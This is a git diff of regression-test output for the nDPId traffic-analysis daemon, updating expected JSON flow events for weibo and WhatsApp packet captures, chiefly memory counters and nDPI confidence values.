-00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","packets-captured":498,"packets-processed":498,"total-skipped-flows":0,"total-l4-payload-len":234875,"total-not-detected-flows":0,"total-guessed-flows":21,"total-detected-flows":23,"total-detection-updates":11,"total-updates":0,"current-active-flows":0,"total-active-flows":44,"total-idle-flows":44,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":239,"global_ts_msec":1463089073893} +00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","packets-captured":498,"packets-processed":498,"total-skipped-flows":0,"total-l4-payload-len":234875,"total-not-detected-flows":0,"total-guessed-flows":21,"total-detected-flows":23,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":44,"total-idle-flows":44,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":238,"global_ts_msec":1463089073893} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 498/498 ~~ skipped flows.............: 0 
@@ -245,9 +244,9 @@ ~~ total active/idle flows...: 44/44 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5933508 bytes -~~ total memory freed........: 5933508 bytes -~~ total allocations/frees...: 118826/118826 +~~ total memory allocated....: 6067142 bytes +~~ total memory freed........: 6067142 bytes +~~ total allocations/frees...: 121588/121588 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 452 chars ~~ json string max len.......: 1029 chars diff --git a/test/results/whatsapp.pcap.out b/test/results/whatsapp.pcap.out index 035b66f80..28827fecd 100644 --- a/test/results/whatsapp.pcap.out +++ b/test/results/whatsapp.pcap.out 
@@ -4,578 +4,578 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1655030801747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655030801747,"pkt":"eJS0JASgYDjgxTWgCABFAAA8ABpAAD8GAijAqAJkszzDMa8EFGbkDT9OAAAAAKAC\/\/\/IawAAAgQFtAQCCArFapnmAAAAAAEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1655030801776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655030801776,"pkt":"eJS0JASgYDjgxTWgCABFAAA0ABtAAD8GAi\/AqAJkszzDMa8EFGbkDT9PTyfQe4AQAKy6dAAAAQEICsVqmgM2ROYE"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655030801861,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655030801861,"pkt":"eJS0JASgYDjgxTWgCABFAAA4ABxAAD8GAirAqAJkszzDMa8EFGbkDT9PTyfQe4AYAKx0zgAAAQEICsVqmlg2ROYERUQAAQ=="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655030801747,"flow_last_seen":1655030801890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1655030801890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":44804,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655030801747,"flow_last_seen":1655030801890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1655030801890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":44804,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":10,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1537,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1655031983762} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655031983762,"flow_last_seen":1655031983762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655031983762,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1655031983762,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655031983762,"pkt":"eJS0JASgYDjgxTWgCABFAAA8wNRAAD8GQW3AqAJkszzDMZyUFGb3fC5VAAAAAKAC\/\/8sUAAAAgQFtAQCCAo3N9QvAAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1655031983792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655031983792,"pkt":"eJS0JASgYDjgxTWgCABFAAA0wNVAAD8GQXTAqAJkszzDMZyUFGb3fC5W\/Bdho4AQAIAA5AAAAQEICjc31GXWXSVb"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1655031983812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655031983812,"pkt":"eJS0JASgYDjgxTWgCABFAAA4wNZAAD8GQW\/AqAJkszzDMZyUFGb3fC5W\/Bdho4AYAIC7fwAAAQEICjc31HjWXSVbRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655031983762,"flow_last_seen":1655031983846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655031983846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40084,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655031983762,"flow_last_seen":1655031983846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655031983846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40084,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655032256845,"flow_last_seen":1655032256845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655032256845,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42272,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1655032256845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655032256845,"pkt":"eJS0JASgYDjgxTWgCABFAAA8\/WJAAD8GBN\/AqAJkszzDMaUgFGax9BloAAAAAKAC\/\/9G8wAAAgQFtAQCCApGZfxIAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1655032256875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655032256875,"pkt":"eJS0JASgYDjgxTWgCABFAAA0\/WNAAD8GBObAqAJkszzDMaUgFGax9BlpNUwtP4AQAVdnOAAAAQEICkZl\/HKo3wGM"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1655032257086,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655032257086,"pkt":"eJS0JASgYDjgxTWgCABFAAA4\/WRAAD8GBOHAqAJkszzDMaUgFGax9BlpNUwtP4AYAVchFQAAAQEICkZl\/USo3wGMRUQAAQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655032256845,"flow_last_seen":1655032257115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655032257115,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42272,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655032256845,"flow_last_seen":1655032257115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655032257115,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42272,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":26,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":25,"total-skipped-flows":0,"total-l4-payload-len":2151,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":19,"global_ts_msec":1655032857220} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655032857220,"flow_last_seen":1655032857220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655032857220,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42436,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1655032857220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655032857220,"pkt":"eJS0JASgYDjgxTWgCABFAAA8wH9AAD8GQcLAqAJkszzDMaXEFGbLQu4oAAAAAKAC\/\/8vAgAAAgQFtAQCCApGbyV9AAAAAAEDAwg="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1655032857250,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655032857250,"pkt":"eJS0JASgYDjgxTWgCABFAAA0wIBAAD8GQcnAqAJkszzDMaXEFGbLQu4pkG\/w9oAQAVfp3wAAAQEICkZvJafXThmp"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1655032857827,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655032857827,"pkt":"eJS0JASgYDjgxTWgCABFAAA4wIFAAD8GQcTAqAJkszzDMaXEFGbLQu4pkG\/w9oAYAVeiWAAAAQEICkZvJ93XThmpRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655032857220,"flow_last_seen":1655032857857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655032857857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42436,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655032857220,"flow_last_seen":1655032857857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655032857857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42436,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":34,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":34,"packets-processed":33,"total-skipped-flows":0,"total-l4-payload-len":2468,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":1655033482376} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655033482376,"flow_last_seen":1655033482376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655033482376,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40178,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1655033482376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655033482376,"pkt":"eJS0JASgYDjgxTWgCABFAAA8gelAAD8GgFjAqAJkszzDMZzyFGaeLx0YAAAAAKAC\/\/83kgAAAgQFtAQCCAo3PDMVAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1655033482414,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655033482414,"pkt":"eJS0JASgYDjgxTWgCABFAAA0gepAAD8GgF\/AqAJkszzDMZzyFGaeLx0Zpn\/BEoAQAIBtAgAAAQEICjc8MzXDJ83z"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1655033482468,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655033482468,"pkt":"eJS0JASgYDjgxTWgCABFAAA4getAAD8GgFrAqAJkszzDMZzyFGaeLx0Zpn\/BEoAYAIAneAAAAQEICjc8M27DJ83zRUQAAQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033482376,"flow_last_seen":1655033482498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655033482498,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40178,"dst_port":5222,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033482376,"flow_last_seen":1655033482498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655033482498,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40178,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655033797377,"flow_last_seen":1655033797377,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655033797377,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42646,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1655033797377,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655033797377,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nO5AAD8GZVPAqAJkszzDMaaWFGa281iWAAAAAKAC\/\/9\/gAAAAgQFtAQCCApGfX4AAAAAAAEDAwg="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1655033797408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655033797408,"pkt":"eJS0JASgYDjgxTWgCABFAAA0nO9AAD8GZVrAqAJkszzDMaaWFGa281iXgu6c24AQAVcrDQAAAQEICkZ9fiWj+b3w"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1655033797436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655033797436,"pkt":"eJS0JASgYDjgxTWgCABFAAA4nPBAAD8GZVXAqAJkszzDMaaWFGa281iXgu6c24AYAVfloAAAAQEICkZ9fkCj+b3wRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033797377,"flow_last_seen":1655033797468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655033797468,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42646,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033797377,"flow_last_seen":1655033797468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655033797468,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42646,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655033850395,"flow_last_seen":1655033850395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655033850395,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40204,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1655033850395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655033850395,"pkt":"eJS0JASgYDjgxTWgCABFAAA88ONAAD8GEV7AqAJkszzDMZ0MFGa\/1NfCAAAAAKAC\/\/\/I8wAAAgQFtAQCCAo3PcVIAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1655033850502,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655033850502,"pkt":"eJS0JASgYDjgxTWgCABFAAA08ORAAD8GEWXAqAJkszzDMZ0MFGa\/1NfDoiLOPYAQAIA8iQAAAQEICjc9xe1pw9\/f"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1655033850502,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655033850502,"pkt":"eJS0JASgYDjgxTWgCABFAAA48OVAAD8GEWDAqAJkszzDMZ0MFGa\/1NfDoiLOPYAYAID3LAAAAQEICjc9xfhpw9\/fRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033850395,"flow_last_seen":1655033850680,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655033850680,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40204,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
